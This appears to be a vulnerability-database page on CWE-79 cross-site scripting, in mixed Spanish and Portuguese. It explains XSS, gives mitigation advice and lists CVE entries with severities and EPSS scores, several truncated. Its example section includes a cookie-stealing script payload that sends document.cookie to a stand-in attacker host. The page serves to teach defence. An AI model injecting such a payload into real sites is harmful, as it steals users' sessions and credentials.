Fallos del tipo CWE-79

28.487 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2014-3146MEDIUMIncomplete blacklist vulnerability in the lxml.html.clean module in lxml before 3.3.5 allows remote attackers to conduct cross-site scriptinEPSS 6.3%CVE-2022-39195MEDIUMA cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML vEPSS 6.3%CVE-2025-54353MEDIUMAn Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet ForEPSS 6.3%CVE-2021-24237—Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)EPSS 6.3%CVE-2022-3766HIGHCross-site Scripting (XSS) - Reflected in thorsten/phpmyfaqEPSS 6.1%CVE-2023-0527LOWPHPGurukul Online Security Guards Hiring System search-request.php cross site scriptingEPSS 6.1%CVE-2023-3843LOWmooSocial mooDating URL question cross site scriptingEPSS 6.0%CVE-2023-3844LOWmooSocial mooDating URL friends cross site scriptingEPSS 6.0%CVE-2023-3847LOWmooSocial mooDating URL users cross site scriptingEPSS 6.0%CVE-2023-3848LOWmooSocial mooDating URL view cross site scriptingEPSS 6.0%CVE-2023-3849LOWmooSocial mooDating URL find-a-match cross site scriptingEPSS 6.0%CVE-2023-3845LOWmooSocial mooDating URL ajax_invite cross site scriptingEPSS 6.0%CVE-2023-3846LOWmooSocial mooDating URL pages cross site scriptingEPSS 6.0%CVE-2025-58747LOWDify MCP OAuth Flow Vulnerable to XSSEPSS 5.7%CVE-2022-0448—CP Blocks < 1.0.15 - Admin+ Stored Cross-Site ScriptingEPSS 5.7%CVE-2020-13959—Velocity Tools XSS VulnerabilityEPSS 5.7%CVE-2021-24245—Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)EPSS 5.7%CVE-2021-21030HIGHMagento Commerce Stored Cross-site Scripting Could Lead To Arbitrary Javascript ExecutionEPSS 5.6%CVE-2021-24299—ReDi Restaurant Reservations < 21.0426 - Unauthenticated Stored Cross-Site Scripting (XSS)EPSS 5.5%CVE-2024-5420HIGHStored Cross-Site Scripting in SEH Computertechnik utnserver ProEPSS 5.5%